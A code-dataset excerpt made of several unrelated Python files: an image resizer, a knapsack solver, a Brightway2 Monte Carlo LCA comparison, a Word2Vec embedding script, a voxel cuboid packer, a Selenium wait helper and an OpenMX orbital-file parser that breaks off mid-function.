def resize_image(image, width=None, height=None, inter=cv2.INTER_AREA):
dim = None
(h, w) = image.shape[:2]
if width is None and height is None:
return image
if (width is not None and width > w) or (height is not None and height > h):
return image
if width is None:
r = height / float(h)
dim = (int(w * r), height)
else:
r = width / float(w)
dim = (width, int(h * r))
resized = cv2.resize(image, dim, interpolation=inter)
return resized
# TODO: replace by checking magic numbers of file format
def is_image_file(file_path):
_, filename = os.path.split(file_path)
return os.path.isfile(file_path) and filename.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif'))
| 2.578125
| 3
|
01-algorithm-design-and-techniques/5_dynamic_programming/knapsack.py
|
hamidgasmi/training.computerscience.algorithms-datastructures
| 8
|
12783499
|
<filename>01-algorithm-design-and-techniques/5_dynamic_programming/knapsack.py<gh_stars>1-10
import sys
def optimal_weight(W, w):
V = [[0 for j in range(W + 1)] for i in range(len(w) + 1)]
for i in range(1, len(w) + 1):
for j in range(1, W + 1):
V[i][j] = V[i - 1][j]
if w[i - 1] <= j:
val = V[i - 1][j - w[i - 1]] + w[i - 1]
if val > V[i][j]:
V[i][j] = val
return V[len(w)][W]
if __name__ == '__main__':
input = sys.stdin.read()
W, n, *w = list(map(int, input.split()))
print(optimal_weight(W, w))
#python3 knapsack.py <<< "10 3 1 4 8" 9
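# Worked example (illustration only): optimal_weight(10, [1, 4, 8]) == 9,
# since the heaviest subset of {1, 4, 8} not exceeding the capacity 10 is 1 + 8.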
| 3.75
| 4
|
04.2_Comparative_MC.py
|
massimopizzol/B4B
| 11
|
12783500
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 30 07:05:07 2018
@author: massimo
"""
from brightway2 import *
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
from scipy import stats
projects
projects.set_current('bw2_import_ecoinvent_3.4')
databases
db = Database("ecoinvent 3.4 conseq")
ipcc = ('IPCC 2013', 'climate change', 'GTP 100a')
# Simple montecarlo on ecoinvent process as we know it.
mydemand = {db.random(): 1} # select a random process
lca = LCA(mydemand, ipcc)
lca.lci()
lca.lcia()
lca.score
mc = MonteCarloLCA(mydemand, ipcc)
mc_results = [next(mc) for x in range(500)]
plt.hist(mc_results, density=True)
plt.ylabel("Probability")
plt.xlabel(methods[ipcc]["unit"])
pd.DataFrame(mc_results).describe()
lca.score
np.exp(np.mean(np.log(mc_results))) # geometric mean
# Now comparative analysis
db.search('lorry transport euro5') # look at the names
activity_name = 'transport, freight, lorry >32 metric ton, EURO5'
for activity in Database("ecoinvent 3.4 conseq"):
if activity['name'] == activity_name:
truckE5 = Database("ecoinvent 3.4 conseq").get(activity['code'])
activity_name = 'transport, freight, lorry >32 metric ton, EURO6'
for activity in Database("ecoinvent 3.4 conseq"):
if activity['name'] == activity_name:
truckE6 = Database("ecoinvent 3.4 conseq").get(activity['code'])
truckE5.as_dict()
truckE6.as_dict()
# make a list with the alternatives
demands = [{truckE5: 1}, {truckE6: 1}]
mc = MonteCarloLCA(demands[0], ipcc)
next(mc)
# look at this first
mc.redo_lcia(demands[0])
mc.score
mc.redo_lcia(demands[1])
mc.score
mc.redo_lcia(demands[0])
mc.score
# Now for several iterations
iterations = 100
simulations = []
for _ in range(iterations):
print(_)
next(mc)
mcresults = []
for i in demands:
mc.redo_lcia(i)
mcresults.append(mc.score)
simulations.append(mcresults)
simulations
df = pd.DataFrame(simulations, columns = ['truckE5','truckE6'])
df.to_csv('ComparativeMCsimulation.csv') # to save it
#plot stuff (using the matplotlib package)
df.plot(kind = 'box')
#df.T.melt()
plt.plot(df.truckE5, df.truckE6, 'o')
plt.xlabel('truckE5 - kg CO2-eq')
plt.ylabel('truckE6 - kg CO2-eq')
# You can see how many times the difference is positive. This is what Simapro does
df['diffe'] = df.truckE5 - df.truckE6
plt.hist(df.diffe.values)
len(df.diffe[df.diffe < 0])
len(df.diffe[df.diffe > 0])
len(df.diffe[df.diffe == 0])
# Statistical testing (using the stats package)
# I can use a paired t-test
t_value, p_value = stats.ttest_rel(df.truckE5,df.truckE6)
t_value
p_value
# But wait! did we check for normality?
plt.hist(df.truckE5.values)
plt.xlabel('truckE5 - kg CO2-eq')
SW_value, SW_p_value = stats.shapiro(df.truckE5)
SW_p_value # Not normally distributed...
plt.hist(df.truckE6.values)
SW_value, SW_p_value = stats.shapiro(df.truckE6)
SW_p_value # Normally distributed if alpha = 0.05... Not strong though if we had, say, 1000 samples
# Alright need a non-parametric test. Wilcox sign rank test
s_value, p_value = stats.wilcoxon(df.truckE5, df.truckE6)
s_value
p_value # Not bad, significant difference!
# What if we had done the MC on the processes independently.
mc1 = MonteCarloLCA({truckE5: 1}, ipcc)
mc1_results = [next(mc1) for x in range(100)]
mc2 = MonteCarloLCA({truckE5: 1}, ipcc) # it's still truckE5!
mc2_results = [next(mc2) for x in range(100)]
df_ind = pd.DataFrame({'mc1': mc1_results, 'mc2' : mc2_results})
# compare to this
demands = [{truckE5: 1}, {truckE5: 1}] # I am using the same process two times.
mc = MonteCarloLCA(demands[0], ipcc)
iterations = 100
simulations = []
for _ in range(iterations):
print(_)
next(mc)
mcresults = []
for i in demands:
mc.redo_lcia(i)
mcresults.append(mc.score)
simulations.append(mcresults)
simulations
df_dep = pd.DataFrame(simulations, columns = ['mc1','mc2'])
# Plot stuff
df_dep.plot(kind = 'box')
df_ind.plot(kind = 'box')
plt.plot(df_dep.mc1, df_dep.mc2, 'o')
plt.plot(df_ind.mc1, df_ind.mc2, 'o') # see?
# and of course:
t_value, p_value = stats.ttest_rel(df_dep.mc1, df_dep.mc2)
t_value
p_value # no difference AT ALL (as expected)
t_value, p_value = stats.ttest_rel(df_ind.mc1, df_ind.mc2)
t_value
p_value # no difference (as expected! But still some variance!)
s_value, p_value = stats.wilcoxon(df_ind.mc1, df_ind.mc2)
s_value
p_value
| 2.796875
| 3
|
model_training/torch2npy.py
|
wurenzhi/-learned_ndv_estimator
| 0
|
12783501
|
from network import Regressor, Loss_gamma_0_6
import numpy as np
import skorch
from skorch import NeuralNetRegressor
from torch import optim
def load_model(load_cp, n_in=106,device='cuda'):
cp = skorch.callbacks.Checkpoint(dirname=load_cp)
net = NeuralNetRegressor(
Regressor(n_in=n_in),
criterion=Loss_gamma_0_6,
max_epochs=2000,
optimizer=optim.Adam,
optimizer__amsgrad=True,
optimizer__weight_decay=0.1,
lr=0.0003,
iterator_train__shuffle=True,
iterator_train__num_workers=32,
iterator_train__pin_memory=True,
device=device,
batch_size=50000,
iterator_train__batch_size=50000,
)
net.initialize()
net.load_params(checkpoint=cp)
return net
def save_model_para(model_cp):
'''
Convert trained model parameters (saved at checkpoint model_cp) to numpy format.
:param model_cp:
:return:
'''
model = load_model(model_cp, n_in=106,device='cpu')
paras = []
for para in model.get_params()['module'].parameters():
paras.append(para.data.cpu().numpy())
np.save("model_paras.npy", paras)
save_model_para('cp_gamma_0_6')
| 2.34375
| 2
|
Kapitel_1/_E1_int_string_adder.py
|
Geralonx/Classes_Tutorial
| 1
|
12783502
|
<filename>Kapitel_1/_E1_int_string_adder.py<gh_stars>1-10
# --- This class demonstrates that the 'other' argument of the dunder methods can be anything ---#
class IntStringAdder(int):
def __init__(self, number):
self.number = number
def __add__(self, other):
if isinstance(other, str):
try:
x = int(other)
except:
raise ValueError(f"String Value >{other}< cannot be converted to 'int'.")
else:
raise TypeError("Wrong datatype, expected a 'str' as 2nd operand.")
return IntStringAdder(self.number + x)
def __str__(self):
return f"My Value is {self.number}"
# --- Instantiate the class via its constructor --- #
my_number = IntStringAdder(10)
# --- Addition via explicit syntax and an implicit method call --- #
# --- The return value is a new instance of the class --- #
my_new_number = my_number + '15'
print(my_new_number)
# --- Raises an error because the str value 'Simon' cannot be converted to an integer --- #
my_new_number = my_number + 'Simon'
| 3.71875
| 4
|
odvm/cuboids.py
|
pmp-p/odvm
| 3
|
12783503
|
<reponame>pmp-p/odvm
def ijk1b_to_idx0_7( i, j, k ):
assert( 0 <= i <= 1 and 0 <= j <= 1 and 0 <= k <= 1 )
return ((k&1)<<2)|((j&1)<<1)|(i&1)
def idx0_7_to_ijk1b( idx ):
assert( 0 <= idx <= 7 )
return ( idx&1, (idx&2)>>1, (idx&4)>>2 )
def ijk2b_to_idx0_63( i, j, k ):
assert( 0 <= i <= 3 and 0 <= j <= 3 and 0 <= k <= 3 )
return ( ((k&1)<<2)|((j&1)<<1)|(i&1) ) | ( ((k&2)<<4)|((j&2)<<3)|((i&2)<<2) )
def idx0_63_to_ijk2b( idx ):
assert( 0 <= idx <= 63 )
return ( ((idx&8)>>2)|(idx&1), ((idx&16)>>3)|((idx&2)>>1), ((idx&32)>>4)|((idx&4)>>2) )
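# Sanity check added for illustration: packing 2-bit (i, j, k) coordinates into
# a 0..63 index and unpacking it again is a round trip, e.g. (3, 1, 2) <-> 43.
assert ijk2b_to_idx0_63(3, 1, 2) == 43
assert idx0_63_to_ijk2b(43) == (3, 1, 2)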
mask_to_2x2x2 = [(0,0,0,0)]*8
mask_to_1x2x2 = [(0,0,0,0)]*16
mask_to_2x1x2 = [(0,0,0,0)]*16
mask_to_2x2x1 = [(0,0,0,0)]*16
mask_to_2x1x1 = [(0,0,0,0)]*32
mask_to_1x2x1 = [(0,0,0,0)]*32
mask_to_1x1x2 = [(0,0,0,0)]*32
mask_to_i2_j2 = [(0,0,0,0,0,0,0)]*64
mask_to_i2_k2 = [(0,0,0,0,0,0,0)]*64
mask_to_j2_k2 = [(0,0,0,0,0,0,0)]*64
def calc_mask_to_xxxxx():
idx0 = 0
idx1 = 0
idx2 = 0
idx3 = 0
for k in (0,2):
for j in (0,2):
for i in (0,2):
m000 = 1<<ijk2b_to_idx0_63( i , j , k )
m010 = 1<<ijk2b_to_idx0_63( i , j+1, k )
m001 = 1<<ijk2b_to_idx0_63( i , j , k+1 )
m011 = 1<<ijk2b_to_idx0_63( i , j+1, k+1 )
m100 = 1<<ijk2b_to_idx0_63( i+1, j , k )
m110 = 1<<ijk2b_to_idx0_63( i+1, j+1, k )
m101 = 1<<ijk2b_to_idx0_63( i+1, j , k+1 )
m111 = 1<<ijk2b_to_idx0_63( i+1, j+1, k+1 )
mask_to_2x2x2[idx0] = (m000|m010|m001|m011|m100|m110|m101|m111,i,j,k)
idx0 += 1
mask_to_1x2x2[idx1+0] = (m000|m010|m001|m011,i ,j ,k )
mask_to_1x2x2[idx1+1] = (m100|m110|m101|m111,i+1,j ,k )
mask_to_2x1x2[idx1+0] = (m000|m100|m001|m101,i ,j ,k )
mask_to_2x1x2[idx1+1] = (m010|m110|m011|m111,i ,j+1,k )
mask_to_2x2x1[idx1+0] = (m000|m100|m010|m110,i ,j ,k )
mask_to_2x2x1[idx1+1] = (m001|m101|m011|m111,i ,j ,k+1)
idx1 += 2
mask_to_2x1x1[idx2+0] = (m000|m100,i ,j ,k )
mask_to_2x1x1[idx2+1] = (m010|m110,i ,j+1,k )
mask_to_2x1x1[idx2+2] = (m001|m101,i ,j ,k+1)
mask_to_2x1x1[idx2+3] = (m011|m111,i ,j+1,k+1)
mask_to_1x2x1[idx2+0] = (m000|m010,i ,j ,k )
mask_to_1x2x1[idx2+1] = (m100|m110,i+1,j ,k )
mask_to_1x2x1[idx2+2] = (m001|m011,i ,j ,k+1)
mask_to_1x2x1[idx2+3] = (m101|m111,i+1,j ,k+1)
mask_to_1x1x2[idx2+0] = (m000|m001,i ,j ,k )
mask_to_1x1x2[idx2+1] = (m100|m101,i+1,j ,k )
mask_to_1x1x2[idx2+2] = (m010|m011,i ,j+1,k )
mask_to_1x1x2[idx2+3] = (m110|m111,i+1,j+1,k )
idx2 += 4
mask_to_i2_j2[idx3+0] = (m000|m100|m001|m011,i ,j ,k ,i ,j ,k+1)
mask_to_i2_j2[idx3+1] = (m000|m100|m101|m111,i ,j ,k ,i+1,j ,k+1)
mask_to_i2_j2[idx3+2] = (m010|m110|m001|m011,i ,j+1,k ,i ,j ,k+1)
mask_to_i2_j2[idx3+3] = (m010|m110|m101|m111,i ,j+1,k ,i+1,j ,k+1)
mask_to_i2_j2[idx3+4] = (m001|m101|m000|m010,i ,j ,k+1,i ,j ,k )
mask_to_i2_j2[idx3+5] = (m001|m101|m100|m110,i ,j ,k+1,i+1,j ,k )
mask_to_i2_j2[idx3+6] = (m011|m111|m000|m010,i ,j+1,k+1,i ,j ,k )
mask_to_i2_j2[idx3+7] = (m011|m111|m100|m110,i ,j+1,k+1,i+1,j ,k )
mask_to_i2_k2[idx3+0] = (m000|m100|m010|m011,i ,j ,k ,i ,j+1,k )
mask_to_i2_k2[idx3+1] = (m000|m100|m110|m111,i ,j ,k ,i+1,j+1,k )
mask_to_i2_k2[idx3+2] = (m010|m110|m000|m001,i ,j+1,k ,i ,j ,k )
mask_to_i2_k2[idx3+3] = (m010|m110|m100|m101,i ,j+1,k ,i+1,j ,k )
mask_to_i2_k2[idx3+4] = (m001|m101|m010|m011,i ,j ,k+1,i ,j+1,k )
mask_to_i2_k2[idx3+5] = (m001|m101|m110|m111,i ,j ,k+1,i+1,j+1,k )
mask_to_i2_k2[idx3+6] = (m011|m111|m000|m001,i ,j+1,k+1,i ,j ,k )
mask_to_i2_k2[idx3+7] = (m011|m111|m100|m101,i ,j+1,k+1,i+1,j ,k )
mask_to_j2_k2[idx3+0] = (m000|m010|m100|m101,i ,j ,k ,i+1,j ,k )
mask_to_j2_k2[idx3+1] = (m000|m010|m110|m111,i ,j ,k ,i+1,j+1,k )
mask_to_j2_k2[idx3+2] = (m100|m110|m000|m001,i+1,j ,k ,i ,j ,k )
mask_to_j2_k2[idx3+3] = (m100|m110|m010|m011,i+1,j ,k ,i ,j+1,k )
mask_to_j2_k2[idx3+4] = (m000|m011|m100|m101,i ,j ,k+1,i+1,j ,k )
mask_to_j2_k2[idx3+5] = (m000|m011|m110|m111,i ,j ,k+1,i+1,j+1,k )
mask_to_j2_k2[idx3+6] = (m101|m111|m000|m001,i+1,j ,k+1,i ,j ,k )
mask_to_j2_k2[idx3+7] = (m101|m111|m010|m011,i+1,j ,k+1,i ,j+1,k )
idx3 += 8
calc_mask_to_xxxxx()
class packed_cuboids(list):
def __init__(self):
list.__init__(self)
self.extend([0]*64)
def add( self, i, j, k ):
assert( 0 <= i <= 15 and 0 <= j <= 15 and 0 <= k <= 15 )
self[ijk2b_to_idx0_63(i>>2,j>>2,k>>2)] |= 1<<ijk2b_to_idx0_63(i&3,j&3,k&3)
def sub( self, i, j, k ):
assert( 0 <= i <= 15 and 0 <= j <= 15 and 0 <= k <= 15 )
idx = ijk2b_to_idx0_63(i>>2,j>>2,k>>2)
mask = 1<<ijk2b_to_idx0_63(i&3,j&3,k&3)
if self[idx] & mask == 0: return False
else:
self[idx] &= ~mask
return True
def get( self, i, j, k ):
assert( 0 <= i <= 15 and 0 <= j <= 15 and 0 <= k <= 15 )
return self[ijk2b_to_idx0_63(i>>2,j>>2,k>>2)] & (1<<ijk2b_to_idx0_63(i&3,j&3,k&3)) != 0
class cuboids_level(list):
def __init__( self, bits=8 ):
list.__init__(self)
self.extend([None]*64)
self.bits = bits
def add( self, i, j, k ):
idx = ijk2b_to_idx0_63(i>>self.bits,j>>self.bits,k>>self.bits)
if self[idx] is None:
if self.bits == 4: self[idx] = packed_cuboids()
else : self[idx] = cuboids_level(self.bits-2)
mask = (1<<self.bits)-1
self[idx].add( i&mask, j&mask, k&mask )
def sub( self, i, j, k ):
idx = ijk2b_to_idx0_63(i>>self.bits,j>>self.bits,k>>self.bits)
if self[idx] is None: return False
else:
mask = (1<<self.bits)-1
return self[idx].sub( i&mask, j&mask, k&mask )
def get( self, i, j, k ):
idx = ijk2b_to_idx0_63(i>>self.bits,j>>self.bits,k>>self.bits)
if self[idx] is None: return False
else:
mask = (1<<self.bits)-1
return self[idx].get( i&mask, j&mask, k&mask )
def compact(self):
empty = 0
if self.bits == 4:
for idx,cs in enumerate(self):
if cs is not None:
if not any(mask for mask in cs): self[idx] = cs = None
if cs is None: empty += 1
else:
for idx,cs in enumerate(self):
if cs is not None:
if cs.compact(): self[idx] = cs = None
if cs is None: empty += 1
return empty == len(self)
def items(self):
if self.bits == 4:
for idx,cs in enumerate(self):
if cs is not None:
i,j,k = idx0_63_to_ijk2b(idx)
yield ( (i<<4,j<<4,k<<4), cs )
else:
for idx,cs1 in enumerate(self):
if cs1 is not None:
i,j,k = idx0_63_to_ijk2b(idx)
i <<= self.bits
j <<= self.bits
k <<= self.bits
for ijk,cs in cs1.items():
yield ( (i+ijk[0],j+ijk[1],k+ijk[2]), cs )
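# Minimal usage sketch (added illustration, not part of the original module):
# an 8-bit sparse voxel level storing one voxel and reading it back.
if __name__ == "__main__":
    level = cuboids_level()
    level.add(5, 9, 200)
    assert level.get(5, 9, 200) and not level.get(5, 9, 201)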
| 1.929688
| 2
|
offers/migrations/0002_alter_emailipo_data_sent.py
|
ccunhafinance/sistema
| 0
|
12783504
|
<reponame>ccunhafinance/sistema
# Generated by Django 3.2.5 on 2021-08-11 15:12
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('offers', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='emailipo',
name='data_sent',
field=models.DateTimeField(default=django.utils.timezone.now, editable=False),
),
]
| 1.40625
| 1
|
src/features/skip_gram.py
|
RausellLab/tiresias
| 6
|
12783505
|
import numpy as np
from gensim.models import Word2Vec
from src.utils import io
def run(
random_walk_files, output_file, dimensions=128, context_size=10, epochs=1, workers=1
):
"""Generates node vector embeddings from a list of files containing random
walks performed on different layers of a multilayer network.
Parameters
----------
random_walk_files: list
List of files containing random walks. Each file should correspond to random walks perform on a different layer
of the network of interest.
output_file: str
The file in which the node embeddings will be saved.
dimensions: int (default: 128)
Number of dimensions of the generated vector embeddings.
context_size: int (default: 10)
Context size in Word2Vec.
epochs: int (default: 1)
Number of epochs in stochastic gradient descent.
workers: int (default: 1)
Number of worker threads used to train the model.
"""
walks = np.concatenate([io.read_random_walks(file) for file in random_walk_files])
#print(walks.shape)
walks_trim = np.split(walks, walks.shape[0])
walks_trim = [walk[walk!=0].astype(str).tolist() for walk in walks]
#print(walks_trim)
model = Word2Vec(
walks_trim,
size=dimensions,
window=context_size,
min_count=0,
sg=1, # use skip-gram
workers=workers,
iter=epochs,
)
model.wv.save_word2vec_format(output_file)
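if __name__ == "__main__":
    # Minimal usage sketch; the file names below are hypothetical placeholders,
    # not part of the original module.
    run(
        random_walk_files=["walks_layer1.txt", "walks_layer2.txt"],
        output_file="node_embeddings.emb",
        dimensions=64,
        context_size=5,
        epochs=5,
        workers=4,
    )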
| 3.0625
| 3
|
greedy/basic/leetcode/F1282/Solution.py
|
ashtishad/problem-solving
| 17
|
12783506
|
<reponame>ashtishad/problem-solving<filename>greedy/basic/leetcode/F1282/Solution.py
# problem name: Group the People Given the Group Size They Belong To
# problem link: https://leetcode.com/problems/group-the-people-given-the-group-size-they-belong-to/
# contest link: (?)
# time: (?)
# author: ratul14
# other_tags: (?)
# difficulty_level: medium
from typing import List
class Solution:
def groupThePeople(self, groupSizes: List[int]) -> List[List[int]]:
ans = list()
gs = groupSizes
def proc(gs: List[int]) -> any:
if set(gs) == {-1}:
return
itm = 0
for i in gs:
if i == -1:
continue
else:
itm = i
break
tmpl = list()
for _ in [0]*itm:
idx = gs.index(itm)
tmpl.append(idx)
gs[idx] = -1
ans.append(tmpl)
proc(gs)
proc(gs)
return ans
| 3.4375
| 3
|
src/bromine/utils/wait.py
|
Etiqa/bromine
| 2
|
12783507
|
<reponame>Etiqa/bromine
from selenium.webdriver.support.ui import WebDriverWait
class Wait(WebDriverWait):
def __init__(self, *args, **kwargs):
super(Wait, self).__init__(None, *args, **kwargs)
def until(self, method, message=''):
return super(Wait, self).until(lambda _: method(), message)
def until_not(self, method, message=''):
return super(Wait, self).until_not(lambda _: method(), message)
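if __name__ == '__main__':
    # Minimal sanity sketch (not part of the original module): unlike
    # WebDriverWait, Wait takes no driver and its predicates take no arguments.
    assert Wait(2).until(lambda: True, message='predicate never became true')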
| 2.625
| 3
|
python_challenges/project_euler/p034_digit_factorials.py
|
bruckhaus/challenges
| 1
|
12783508
|
import math
__author__ = 'tilmannbruckhaus'
class DigitFactorials:
"""
Digit factorials
Problem 34
145 is a curious number, as 1! + 4! + 5! = 1 + 24 + 120 = 145.
Find the sum of all numbers which are equal to the sum of the factorial of their digits.
Note: as 1! = 1 and 2! = 2 are not sums they are not included.
"""
def __init__(self):
pass
@staticmethod
def find(n):
d = DigitFactorials
digit_factorial_sum = 0
for i in range(3, n):
if d.is_digit_factorial(i):
if __name__ == '__main__':
print "found digit factorial:", i
digit_factorial_sum += i
if __name__ == '__main__':
if i % 1000000 == 0:
print(i)
return digit_factorial_sum
@staticmethod
def is_digit_factorial(i):
factorial_sum = 0
for digit in str(i):
factorial_sum += math.factorial(int(digit))
return factorial_sum == i
if __name__ == '__main__':
d = DigitFactorials.find(10000000)
print "The sum of all numbers which are equal to the sum of the factorial of their digits is", d
| 3.9375
| 4
|
GUI_tools/OpenMX_orbitals/PAO_parser.py
|
Hiroaki-Tanaka-0606/calcPSF
| 1
|
12783509
|
<reponame>Hiroaki-Tanaka-0606/calcPSF
# PAO_parser
# read .pao files (before or after optimized)
import re
import numpy as np
import math
import Config
class PAO_parser:
def __init__(self, filePath, optimized):
# variables
self.number_optpao=0
self.grid_output=0
self.maxL_pao=0
self.num_pao=0
self.PAO_Lmax=0
self.PAO_Mul=0
self.CCoes=None
self.PAOs=None
self.x=None
self.r=None
self.OrthNorm=None
self.valence_min=[]
# read contraction coefficients, grid.num.output, number.vps, <pseudo.NandL>
# read maxL.pao, num.pao
# read PAO.Lmax(=maxL.pao), PAO.Mul(=num.pao), pseudo.atomic.orbitals
with open(filePath, "r") as f:
# number.optpao
while optimized:
line=f.readline()
re_result=re.findall(r"number\.optpao\s*(\d+)", line)
if len(re_result)>0:
self.number_optpao=int(re_result[0])
print(("number.optpao is {0:d}").format(self.number_optpao))
break
re_result=re.findall(r"^\s*Input file\s*$", line)
if len(re_result)>0:
print("Warning: number.optpao is not found")
break
ccoes=[]
# Contraction.coefficients
for cindex in range(1, self.number_optpao+1):
while len(re.findall(r"<Contraction.coefficients"+str(cindex), line))==0:
line=f.readline()
num_rows=int(f.readline())
for lindex in range(0, num_rows):
line=f.readline()
re_result=re.findall(r"^\s+Atom=\s*\d+\s*"+\
r"L=\s*(\d+)\s*"+\
r"Mul=\s*\d+\s*"+\
r"p=\s*(\d+)\s*"+\
r"([0-9\.\-]+)", line)
if len(re_result)==0:
print("Error in parsing Contraction.coefficients")
return
ccoes.append([int(re_result[0][0]),\
int(re_result[0][1]),\
float(re_result[0][2])])
line=f.readline()
if len(re.findall(r"Contraction.coefficients"+str(cindex)+">", line))==1:
print(("Reading contraction coefficients {0:d} finished").format(cindex))
else:
print("Error in reading Contraction.coefficients")
return
# grid.num.output
while True:
line=f.readline()
re_result=re.findall(r"grid\.num\.output\s*(\d+)", line)
if len(re_result)>0:
self.grid_output=int(re_result[0])
print(("grid.num.output is {:d}").format(self.grid_output))
break
if len(line)==0:
print("Error: cannot find grid.num.output")
return
# number.vps
number_vps=-1
while True:
line=f.readline()
re_result=re.findall(r"number\.vps\s*(\d+)", line)
if len(re_result)>0:
number_vps=int(re_result[0])
print(("number.vps is {:d}").format(number_vps))
break
if len(line)==0:
print("Error: cannot find number.vps")
return
# <pseudo.NandL>
pseudo_NL=[]
maxL=-1
while True:
line=f.readline()
re_result=re.findall(r"<pseudo.NandL", line)
if len(re_result)>0:
for i in range(0, number_vps):
line=f.readline()
re_result=re.findall(r"\s*\d+\s*(\d+)\s*(\d+)", line)
if len(re_result)>0:
pseudo_NL.append([int(re_result[0][0]), int(re_result[0][1])])
if maxL<int(re_result[0][1]):
maxL=int(re_result[0][1])
line=f.readline()
re_result=re.findall("pseudo.NandL>", line)
if len(re_result)==0:
print("Error in pseudo.NandL")
return
for l in range(0, maxL+1):
self.valence_min.append(-1)
for data in pseudo_NL:
if self.valence_min[data[1]]<0 or self.valence_min[data[1]]>data[0]:
self.valence_min[data[1]]=data[0]
break
# maxL.pao
while True:
line=f.readline()
re_result=re.findall(r"maxL\.pao\s*(\d+)", line)
if len(re_result)>0:
self.maxL_pao=int(re_result[0])
print(("maxL.pao is {:d}").format(self.maxL_pao))
break
if len(line)==0:
print("Error: cannot find maxL.pao")
return
# num.pao
while True:
line=f.readline()
re_result=re.findall(r"num\.pao\s*(\d+)", line)
if len(re_result)>0:
self.num_pao=int(re_result[0])
print(("num.pao is {:d}").format(self.num_pao))
break
if len(line)==0:
print("Error: cannot find num.pao")
return
# PAO.Lmax
while True:
line=f.readline()
re_result=re.findall(r"PAO.Lmax\s*(\d+)", line)
if len(re_result)>0:
self.PAO_Lmax=int(re_result[0])
print(("PAO.Lmax is {:d}").format(self.PAO_Lmax))
if self.PAO_Lmax!=self.maxL_pao:
print("Error: maxL.pao!=PAO.Lmax")
return
break
if len(line)==0:
print("Error: cannot find PAO.Lmax")
return
# PAO.Mul
while True:
line=f.readline()
re_result=re.findall(r"PAO\.Mul\s*(\d+)", line)
if len(re_result)>0:
self.PAO_Mul=int(re_result[0])
print(("PAO.Mul is {:d}").format(self.PAO_Mul))
if self.PAO_Mul!=self.num_pao:
print("Error: num.pao!=PAO_Mul")
return
break
if len(line)==0:
print("Error: cannot find PAO_Mul")
return
# put contraction coefficients in numpy
self.CCoes=np.zeros((self.PAO_Lmax+1, self.PAO_Mul, self.PAO_Mul))
Mul_indices=[]
for i in range(0,self.PAO_Lmax+1):
Mul_indices.append(-1)
for j in range(0, self.PAO_Mul):
self.CCoes[i][j][j]=1
for ccoe in ccoes:
if ccoe[1]==0:
Mul_indices[ccoe[0]]+=1
i=Mul_indices[ccoe[0]]
self.CCoes[ccoe[0]][i][ccoe[1]]=ccoe[2]
self.OrthNorm=np.zeros((self.PAO_Lmax+1, self.PAO_Mul, self.PAO_Mul))
# for mat in self.CCoes:
# print(mat)
# pseudo atomic orbitals
self.x=np.zeros((self.grid_output,))
self.r=np.zeros((self.grid_output,))
self.PAOs=np.zeros((self.PAO_Lmax+1, self.PAO_Mul, self.grid_output))
for l in range(0, self.PAO_Lmax+1):
while True:
line=f.readline()
re_result=re.findall(r"<pseudo\.atomic\.orbitals\.L="+str(l), line)
if len(re_result)>0:
break
if len(line)==0:
print("Error: cannot find pseudo atomic orbitals")
return
for i in range(0, self.grid_output):
line_arr=f.readline().split()
try:
self.x[i]=float(line_arr[0])
self.r[i]=float(line_arr[1])
for j in range(0, self.PAO_Mul):
self.PAOs[l][j][i]=float(line_arr[j+2])
except Exception as e:
print(e)
return
line=f.readline()
re_result=re.findall(r"pseudo.atomic.orbitals.L="+str(l)+">", line)
if len(re_result)>0:
print(("Reading pseudo atomic orbitals L= {0:d} finished").format(l))
# Gram-Schmidt orthonormalization
if optimized:
for l, CCoe_mat in enumerate(self.CCoes):
for i in range(1, self.PAO_Mul):
for j in range(0, i):
# orthogonalization
norm=np.dot(CCoe_mat[i], CCoe_mat[j])
CCoe_mat[i]-=norm*CCoe_mat[j]
# normalization
norm2=np.dot(CCoe_mat[i], CCoe_mat[i])
CCoe_mat[i]/=math.sqrt(norm2)
# print(("Orthonormalized contraction coefficients for L= {0:d}").format(l))
# for i in range(0, self.PAO_Mul):
# for j in range(0, self.PAO_Mul):
# print(("{0:7.4f} ").format(CCoe_mat[i][j]), end="")
#
# print("")
# print("")
# Orthonormalization check of orbitals
for l in range(0, self.PAO_Lmax+1):
for i in range(0, self.PAO_Mul):
for j in range(0, i+1):
norm=0.0
for k in range(0, self.grid_output-1):
norm+=self.PAOs[l][i][k]*self.PAOs[l][j][k]*math.pow(self.r[k], 2)*(self.r[k+1]-self.r[k])
self.OrthNorm[l][i][j]=norm
self.OrthNorm[l][j][i]=norm
def calcContraction(after, before, matrix):
Lmax=after.PAO_Lmax
Mul1=after.PAO_Mul
Mul2=before.PAO_Mul
grid=after.grid_output
for l in range(0, Lmax+1):
for i in range(0, Mul1):
for j in range(0, Mul2):
norm1=0.0
norm2=0.0
for k in range(0, grid-1):
norm1+=after.PAOs[l][i][k]*before.PAOs[l][j][k]*math.pow(before.r[k],2)*(before.r[k+1]-before.r[k])
norm2+=before.PAOs[l][j][k]*before.PAOs[l][j][k]*math.pow(before.r[k],2)*(before.r[k+1]-before.r[k])
matrix[l][i][j]=norm1/norm2
def reproducePAO(before, ccoes, reproduced):
Lsize=len(ccoes)
Mul1=len(ccoes[0])
Mul2=before.PAO_Mul
for l in range(0, Lsize):
for i in range(0, Mul1):
for j in range(0, Mul2):
reproduced[l][i]+=before.PAOs[l][j]*ccoes[l][i][j]
def normCheck(PAO, AO):
Lmax=PAO.PAO_Lmax
valence_min=PAO.valence_min
Mul=PAO.PAO_Mul
grid=PAO.grid_output
for Mul_PAO in range(0, Mul):
for l in range(0, Lmax+1):
Mul_AO=Mul_PAO+(valence_min[l]-(l+1) if len(valence_min)>l else 0)
norm1=0.0
norm2=0.0
for k in range(round(grid*0.9), grid-1):
norm1+=PAO.PAOs[l][Mul_PAO][k]*AO.AOs[l][Mul_AO][k]*math.pow(PAO.r[k],2)*(PAO.r[k+1]-PAO.r[k])
norm2+=PAO.PAOs[l][Mul_PAO][k]*PAO.PAOs[l][Mul_PAO][k]*math.pow(PAO.r[k],2)*(PAO.r[k+1]-PAO.r[k])
if norm1/norm2<Config.invert_criterion:
print(("{0:d}{1:s} in AO is inverted, norm={2:.3f}").format(Mul_AO+l+1, Config.azimuthal[l], norm1/norm2))
AO.AOs[l][Mul_AO]*=-1
def reproduceAO(AO, PAO, ccoes, reproduced):
Lsize=len(ccoes)
Mul1=len(ccoes[0])
Mul2=PAO.PAO_Mul
for l in range(0, Lsize):
for i in range(0, Mul1):
